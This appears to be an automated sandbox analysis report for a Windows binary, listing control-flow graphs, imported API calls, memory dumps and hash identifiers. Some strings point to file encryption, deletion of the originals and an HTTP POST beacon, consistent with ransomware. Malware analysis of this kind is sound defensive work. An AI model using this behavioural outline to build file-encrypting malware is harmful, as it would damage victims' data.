7ff6f18ab455-7ff6f18ab46f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 517->524 526 7ff6f18ab4c9 518->526 525 7ff6f18ab4a0-7ff6f18ab4a3 519->525 522 7ff6f18ab530-7ff6f18ab544 520->522 523 7ff6f18ab529-7ff6f18ab52f 520->523 521->520 523->522 527 7ff6f18ab471-7ff6f18ab476 524->527 528 7ff6f18ab478-7ff6f18ab47b 524->528 529 7ff6f18ab4a5-7ff6f18ab4bf ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 525->529 530 7ff6f18ab4cd-7ff6f18ab4dd 525->530 526->530 527->526 528->517 529->518 532 7ff6f18ab4c1-7ff6f18ab4c4 529->532 530->513 532->525
                APIs
                • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
                • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466
                • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB48F
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4B6
                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
                • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                • String ID:
                • API String ID: 4121003011-0
                • Opcode ID: 3462d9b7555ee2de00ba9a5cf3846b59dc205635d2c231214787e45c29ca3882
                • Instruction ID: 86d540f28715f7e0fede8a45ad7c33f917297dc23157c80f6face401150ba62b
                • Opcode Fuzzy Hash: 3462d9b7555ee2de00ba9a5cf3846b59dc205635d2c231214787e45c29ca3882
                • Instruction Fuzzy Hash: 24510132619A4192EB208F1AE6D0239ABA1FF85FD5B15C532CE7E877E0DF39D4469300

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 533 7ff6f18ad310-7ff6f18ad344 534 7ff6f18ad350 533->534 535 7ff6f18ad346-7ff6f18ad349 533->535 537 7ff6f18ad352-7ff6f18ad362 534->537 535->534 536 7ff6f18ad34b-7ff6f18ad34e 535->536 536->537 538 7ff6f18ad364-7ff6f18ad36a 537->538 539 7ff6f18ad36b-7ff6f18ad37d ?good@ios_base@std@@QEBA_NXZ 537->539 538->539 540 7ff6f18ad3af-7ff6f18ad3b5 539->540 541 7ff6f18ad37f-7ff6f18ad38e 539->541 545 7ff6f18ad3c1-7ff6f18ad3d4 540->545 546 7ff6f18ad3b7-7ff6f18ad3bc 540->546 543 7ff6f18ad390-7ff6f18ad393 541->543 544 7ff6f18ad3ad 541->544 543->544 549 7ff6f18ad395-7ff6f18ad3ab ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 543->549 544->540 547 7ff6f18ad3d6-7ff6f18ad3d9 545->547 548 7ff6f18ad407-7ff6f18ad422 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 545->548 550 7ff6f18ad471-7ff6f18ad48f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 546->550 547->548 551 7ff6f18ad3db-7ff6f18ad3f5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 547->551 552 7ff6f18ad424-7ff6f18ad427 548->552 553 7ff6f18ad44a-7ff6f18ad44d 548->553 549->540 554 7ff6f18ad491-7ff6f18ad49a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 550->554 555 7ff6f18ad49b-7ff6f18ad4aa 550->555 556 7ff6f18ad402-7ff6f18ad405 551->556 557 7ff6f18ad3f7-7ff6f18ad400 551->557 558 7ff6f18ad451-7ff6f18ad461 552->558 559 7ff6f18ad429-7ff6f18ad443 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 552->559 553->558 554->555 560 7ff6f18ad4b3-7ff6f18ad4c7 555->560 561 7ff6f18ad4ac-7ff6f18ad4b2 555->561 556->547 557->552 558->550 559->553 562 7ff6f18ad445-7ff6f18ad448 559->562 561->560 562->552
                APIs
                • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD375
                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6F18AD395
                • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD3A5
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD3EC
                • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6F18AD419
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD43A
                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18AD480
                • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF6F18AD487
                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6F18AD494
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                • String ID:
                • API String ID: 4121003011-0
                • Opcode ID: 63d12ad91d8d052035e74c89f684042e8a42cf7a3404af68e9b38cf56b28d611
                • Instruction ID: 246158e1741331d29a4de69566f5f1fddde30ebca30644ae8f9dcd4873990928
                • Opcode Fuzzy Hash: 63d12ad91d8d052035e74c89f684042e8a42cf7a3404af68e9b38cf56b28d611
                • Instruction Fuzzy Hash: 97510322619A4192EB109F1AD6D4239ABA1EF84FD5B158632CE7FC77E0EF3DD4468700

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: __p___argc__p___argv__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                • String ID:
                • API String ID: 1328870896-0
                • Opcode ID: 5987aea95579cd77aaa9fd0ad415828929488927b8469b89735c87e27d90c774
                • Instruction ID: f409463ce9fbb4d30063226281741eb9fcc6ffbfbba287e797d4b6e706c78b73
                • Opcode Fuzzy Hash: 5987aea95579cd77aaa9fd0ad415828929488927b8469b89735c87e27d90c774
                • Instruction Fuzzy Hash: 84315B21E2C64386FB14AB65A7513B92B91AF857C4F444235EA7DE72D3FF2CB404A740

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ErrorExceptionLastThrow__std_exception_copy
                • String ID: BCryptOpenAlgorithmProvider$Microsoft Primitive Provider$RNG
                • API String ID: 160102542-2191745741
                • Opcode ID: 9242949c5363bc01ddcdd0a36b89c6e69421f7e38dcfa858ad304915a2ff4439
                • Instruction ID: abb2b382359b004f52a681362a99d8cce9892b163445ddec93df7d2d0f9ae18f
                • Opcode Fuzzy Hash: 9242949c5363bc01ddcdd0a36b89c6e69421f7e38dcfa858ad304915a2ff4439
                • Instruction Fuzzy Hash: 16218F62A28B46A1EB109F64EA503A97361FF54784F405132D67C876A5FF3CE559C340

                Control-flow Graph

                APIs
                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A5D
                • ?set_new_handler@std@@YAP6AXXZP6AXXZ@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A6A
                • ?set_new_handler@std@@YAP6AXXZP6AXXZ@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A7A
                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8A84
                • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A11F8), ref: 00007FF6F18B8AB0
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ?set_new_handler@std@@malloc$ExceptionThrow
                • String ID:
                • API String ID: 1468705217-0
                • Opcode ID: 3e3b4191124bf01ac2182a653dbe02a0b105a4859c853f67138aa2f096f8bec7
                • Instruction ID: bd115aa4b162212aaa56a269f48c935b1b6ba7fcfcdb9343a33c673200748b86
                • Opcode Fuzzy Hash: 3e3b4191124bf01ac2182a653dbe02a0b105a4859c853f67138aa2f096f8bec7
                • Instruction Fuzzy Hash: B0F0BE12B2D74341EF64A726F6801B86362AF85BC0F484539D63E827D6FF3CE5008301

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow
                • String ID: : this object doesn't support a special last block
                • API String ID: 432778473-2028240571
                • Opcode ID: 47f8e7ea62875c6c0e2d49a71016d77fed404429af8c742b563867617be4b125
                • Instruction ID: 1c657edfc520c6702644f01ee3601d05cbbae5767a85a7c6b0141bca4ba78cab
                • Opcode Fuzzy Hash: 47f8e7ea62875c6c0e2d49a71016d77fed404429af8c742b563867617be4b125
                • Instruction Fuzzy Hash: C131C162714B8992EB20DB16E9147AA6360FF89FC4F444032DF6D877A5EF2CD509C700

                Control-flow Graph

                APIs
                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF6F18AB565
                • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF6F18AB571
                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6F18AB57A
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                • String ID:
                • API String ID: 1875450691-0
                • Opcode ID: 443187194c09cde17285622938cc0493cdbe5d21a2750599dc9375fd71388739
                • Instruction ID: 98e844617643ec7232c6379f79744f43a1850334be10ba98e37194d22f05b4c4
                • Opcode Fuzzy Hash: 443187194c09cde17285622938cc0493cdbe5d21a2750599dc9375fd71388739
                • Instruction Fuzzy Hash: 2AD01251B9470781DB089F56B9541382711AF49FC1B0C5032CD2F86350DE3DD0558304

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _time64
                • String ID:
                • API String ID: 1670930206-0
                • Opcode ID: 22a958c5b4102628f872bb504c0af6238b6a5a6fc2fbbabefdb748feeaa96bdf
                • Instruction ID: 9a70031e5701c47b8e0e699f022a68f6f3af6e9c85e799c6d0095f48f1ff887d
                • Opcode Fuzzy Hash: 22a958c5b4102628f872bb504c0af6238b6a5a6fc2fbbabefdb748feeaa96bdf
                • Instruction Fuzzy Hash: 94316B32614B8482D760CF16E594B9ABBA4F789FC8F549025DFAD83B55DF39C065CB00
                APIs
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
                  • Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
                  • Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
                  • Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
                  • Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5FDE
                • InternetOpenW.WININET ref: 00007FF6F18A5FFB
                • GetLastError.KERNEL32 ref: 00007FF6F18A601F
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A602A
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A603A
                • InternetCrackUrlW.WININET ref: 00007FF6F18A60F6
                • GetLastError.KERNEL32 ref: 00007FF6F18A611A
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A6125
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A6135
                • InternetCloseHandle.WININET ref: 00007FF6F18A613E
                • InternetConnectW.WININET ref: 00007FF6F18A61FA
                • HttpOpenRequestW.WININET ref: 00007FF6F18A624C
                • GetLastError.KERNEL32 ref: 00007FF6F18A6270
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A627B
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A628B
                • InternetCloseHandle.WININET ref: 00007FF6F18A6294
                • HttpSendRequestW.WININET ref: 00007FF6F18A62ED
                • GetLastError.KERNEL32 ref: 00007FF6F18A6311
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A631C
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A632C
                • InternetCloseHandle.WININET ref: 00007FF6F18A6335
                • InternetCloseHandle.WININET ref: 00007FF6F18A633E
                • InternetCloseHandle.WININET ref: 00007FF6F18A6347
                  • Part of subcall function 00007FF6F18AB370: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$Internet$CloseHandleV01@@$ErrorLast$?good@ios_base@std@@HttpOpenRequest$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@?uncaught_exceptions@std@@ConnectCrackOsfx@?$basic_ostream@SendV12@
                • String ID: with data: $.enc$Content-Type: application/x-www-form-urlencoded$Encryptor$Error opening files for encryption: $HttpOpenRequest failed with error: $HttpSendRequest failed with error: $InternetConnect failed with error: $InternetCrackUrl failed with error: $InternetOpen failed with error: $Making POST request to: $POST$POST request completed with response: $h$remove$text/*
                • API String ID: 730722797-3239946946
                • Opcode ID: b5a2be8c57679f83b7efd29263f6ff0ced3688bc93fe687ca8b7c3f66dfcc50e
                • Instruction ID: 82f1e58abaa0ae037284ee8d112c2b688788e6990358d41fda91ed99edec9afc
                • Opcode Fuzzy Hash: b5a2be8c57679f83b7efd29263f6ff0ced3688bc93fe687ca8b7c3f66dfcc50e
                • Instruction Fuzzy Hash: 7772A562F28B8292EB10DB25E5443AD7761FB85BD4F505236DABD82AD9EF3CD184C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                • String ID:
                • API String ID: 4293554670-0
                • Opcode ID: c42828e7afe3a8f2a65d1a0de966bafc8e91fa9268b19287f0389173d9b8275d
                • Instruction ID: 0a3e07af3a1ee4a7ed8b0f7540523eeea150b882b21af8bed66d2f075fd7330c
                • Opcode Fuzzy Hash: c42828e7afe3a8f2a65d1a0de966bafc8e91fa9268b19287f0389173d9b8275d
                • Instruction Fuzzy Hash: B1918031B28A4346E764AB25AA4467636A1EF84BF4F040735D97F876E4FF3CE8458780
                APIs
                • memmove.VCRUNTIME140 ref: 00007FF6F18AE856
                • __std_type_info_name.VCRUNTIME140 ref: 00007FF6F18AE8BE
                • memmove.VCRUNTIME140 ref: 00007FF6F18AE953
                • __std_type_info_name.VCRUNTIME140 ref: 00007FF6F18AE9BD
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190
                  • Part of subcall function 00007FF6F18AE090: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE1C9
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1D3
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1E1
                  • Part of subcall function 00007FF6F18AE090: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AE216
                  • Part of subcall function 00007FF6F18AADA0: memmove.VCRUNTIME140 ref: 00007FF6F18AADE6
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEAE8
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEB29
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEB7A
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEBCA
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEC1A
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEC69
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
